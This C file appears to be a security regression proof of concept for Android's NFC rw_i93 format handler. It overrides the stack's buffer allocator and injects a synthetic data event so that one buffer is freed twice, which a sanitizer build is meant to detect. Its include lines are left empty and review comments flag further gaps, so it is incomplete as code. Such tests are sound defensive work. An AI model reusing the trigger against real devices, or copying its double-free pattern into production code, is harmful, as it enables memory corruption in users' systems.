/*
 * Copyright (C) 2021 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/*
 * Regression harness for the NFC rw_i93 "format" state machine.
 *
 * The program brings up the reader/writer stack, forces rw_cb.tcb.i93 into
 * RW_I93_STATE_FORMAT / RW_I93_SUBSTATE_CHECK_READ_ONLY and then delivers a
 * single synthetic NFC_DATA_CEVT straight to the RF connection callback.
 * GKI_getbuf() and GKI_freebuf() are overridden below so that the one GKI
 * buffer of RW_I93_FORMAT_DATA_LEN bytes requested on that path is the only
 * GKI buffer that is ever really released; a second GKI_freebuf() on that
 * same buffer reaches free() again, which a sanitizer-instrumented build is
 * presumably meant to catch.
 */

/* NOTE(review): the five angle-bracket #include lines lost their header
 * names in extraction; restore them from the original source file. */
#include
#include
#include
#include
#include
#include "../includes/common.h"
#include "../includes/memutils.h"

/* Controls the allocator interposition provided by memutils.h.  Switched to
 * ENABLE_ALL before the trigger and back to ENABLE_NONE only on the success
 * path of main(). */
char enable_selective_overload = ENABLE_NONE;

// borrowed from rw_i93.cc
#define RW_I93_FORMAT_DATA_LEN 8

extern tRW_CB rw_cb;
extern tNFC_CB nfc_cb;

void rw_init(void);
tNFC_STATUS rw_i93_select(uint8_t* p_uid);

/* The most recently allocated GKI buffer of exactly RW_I93_FORMAT_DATA_LEN
 * bytes; the only buffer GKI_freebuf() below will ever hand to free(). */
void* vulnerable_ptr;

/*
 * Replacement for the stack's GKI_getbuf().
 *
 * Allocates `size` bytes with malloc().  When the request is exactly
 * RW_I93_FORMAT_DATA_LEN bytes the result is recorded in vulnerable_ptr,
 * overwriting any earlier record.  Returns whatever malloc() returned,
 * including NULL on failure (callers in the library are expected to check).
 */
void* GKI_getbuf(uint16_t size) {
  void* buf = malloc(size);
  if (size != RW_I93_FORMAT_DATA_LEN) {
    return buf;
  }
  vulnerable_ptr = buf;
  return buf;
}

/*
 * Replacement for the stack's GKI_freebuf().
 *
 * Only the buffer recorded in vulnerable_ptr is forwarded to free(); every
 * other buffer stays allocated for the life of the process.  vulnerable_ptr
 * is not cleared here, so a repeated release of the tracked buffer is
 * forwarded to free() a second time.
 */
void GKI_freebuf(void* p_buf) {
  if (p_buf != vulnerable_ptr) {
    return;
  }
  free(p_buf);
}

/*
 * Entry point.
 *
 * Returns EXIT_SUCCESS once the synthetic data event has been delivered to
 * the RF connection callback, EXIT_FAILURE if tag selection or one of the
 * two heap allocations fails.  On the failure paths
 * enable_selective_overload is left at ENABLE_ALL.
 */
int main() {
  enable_selective_overload = ENABLE_ALL;

  GKI_init();
  rw_init();

  /* NOTE(review): rw_i93_select() is handed a pointer to a single byte.  If
   * it copies a full UID (I93_UID_BYTE_LEN bytes) out of it, that read runs
   * past this variable on the stack — confirm against rw_i93.cc. */
  uint8_t uid = 1;
  if (rw_i93_select(&uid) != NFC_STATUS_OK) {
    return EXIT_FAILURE;
  }

  tNFC_CONN* evt = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
  if (evt == NULL) {
    return EXIT_FAILURE;
  }
  NFC_HDR* hdr = (NFC_HDR*)malloc(sizeof(NFC_HDR));
  if (hdr == NULL) {
    free(evt);
    return EXIT_FAILURE;
  }
  /* NOTE(review): *hdr and every field of *evt other than status and
   * data.p_data are left uninitialised; if the callback reads them the
   * outcome is nondeterministic — confirm this is intended. */
  evt->data.p_data = hdr;
  evt->status = NFC_STATUS_OK;

  /* Put the I93 control block directly into the format / check-read-only
   * sub-state so the data event is consumed by that handler. */
  tRW_I93_CB* i93 = &rw_cb.tcb.i93;
  i93->state = RW_I93_STATE_FORMAT;
  i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY;
  i93->block_size = I93_MAX_BLOCK_LENGH - 1;

  /* Give the quick-timer queue a non-NULL head so timer bookkeeping done
   * inside the callback has something to walk. */
  TIMER_LIST_ENT head = {};
  nfc_cb.quick_timer_queue.p_first = &head;

  /* Deliver the event on the static RF connection, bypassing the NCI layer. */
  tNFC_CONN_CB* conn = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
  conn->p_cback(0, NFC_DATA_CEVT, evt);

  free(evt->data.p_data);
  free(evt);
  enable_selective_overload = ENABLE_NONE;
  return EXIT_SUCCESS;
}